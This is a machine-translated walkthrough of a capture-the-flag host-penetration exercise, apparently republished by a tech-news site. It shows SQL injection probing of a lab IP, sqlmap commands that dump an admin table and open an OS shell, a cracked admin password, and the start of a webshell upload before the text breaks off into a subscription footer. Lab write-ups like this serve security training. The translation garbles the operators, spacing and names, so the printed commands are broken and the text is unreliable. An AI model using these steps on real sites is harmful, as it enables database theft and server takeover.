Shulou(Shulou.com)05/31 Report--

This article mainly introduces the relevant knowledge of what is the method of CTF host infiltration, the content is detailed and easy to understand, the operation is simple and fast, and has a certain reference value. I believe you will gain something after reading this CTF host infiltration method. Let's take a look at it.

Step 1: first open the connection address: http://202.0.0.207

Step 2: find the loophole. When we click on the page, we see the website that is PHP, and the parameter in url is cid. Then we can try using sql injection to see if there are sql injection vulnerabilities.

We use manual judgment:

Http://202.0.0.207/product.php?cid=3', page exception

Http://202.0.0.207/product.php?cid=3 and 1x 1, normal

Http://202.0.0.207/product.php?cid=3 and 1x2, exception

Thus it is judged that there must be a sql injection vulnerability here, and the parameter type is integer.

Here we can use blind injection to manually inject. Because sqlmap also supports blind injection types, in order to save time, let's use sqlmap to remove the library.

Step 2: use sqlmap to remove the library

Sqlmap-u http://202.0.0.207/product.php?cid=3

This parameter reveals that time blind injection and joint injection attacks can be realized.

Next, let's just start running the library.

Sqlmap-u http://202.0.0.207/product.php?cid=3-dbs

Let's choose 510cms database to explode.

Sqlmap-u http://202.0.0.207/product.php?cid=3-D 510cms-tables

Try to shoot 510_admin again.

Sqlmap-u http://202.0.0.207/product.php?cid=3-D 510cms-T 510_admin-- columns

Next, burst the data.

Sqlmap-u http://202.0.0.207/product.php?cid=3-D 510cms-T 510_admin-C id,mid,name,passwd,remark-dump

Then we want the password of the admin user: 8dbdf8221fcf4bd6ac5a48317baa948c. After online MD5 decryption, the password is adminlwphp.

Step 3: let's go to the background login page next.

Here I use the Imperial Sword background scanner.

First of all, let's look at the source code of the login page to see if there is a flag. Sure enough, we get a flag3 {d3eac3a68b7d3863cc7bd45ba948195d} here.

Next, we log in using the administrator account and password from the burst library: admin/ adminlwphp. Login is successful.

Step 4: messing around

After entering the background, now we can only go around to collect useful information to see if there is a place to take flag directly. Accidentally, we suddenly saw the absolute path of the website, CWR Universe www. According to the sql injection loophole, can we get cmdshell? Let's try it next.

Sqlmap-u http://202.0.0.207/product.php?cid=3-- os-shell

Sure enough, we got the cmdshell. The real XX is a pleasant surprise, so let's take a look at what the system permissions are now.

Step 5: upload and use Trojans in a word

Next, I will directly write a sentence called Trojan Horse.

Echo ^

Welcome to subscribe "Shulou Technology Information " to get latest news, interesting things and hot topics in the IT industry, and controls the hottest and latest Internet news, technology news and IT industry trends.